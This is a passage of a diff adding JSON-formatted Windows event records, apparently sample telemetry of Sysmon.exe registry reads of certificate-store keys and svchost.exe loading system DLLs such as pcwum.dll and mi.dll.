"timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "pcwum.dll", + "image_path": "C:\\Windows\\System32\\pcwum.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", 
+ "registry_value": "Certificates", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "mi.dll", + "image_path": "C:\\Windows\\System32\\mi.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 
131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 
131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wkscli.dll", + "image_path": "C:\\Windows\\System32\\wkscli.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570880110000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + 
"process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "OnDemandConnRouteHelper.dll", + "image_path": "C:\\Windows\\System32\\OnDemandConnRouteHelper.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570880110000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
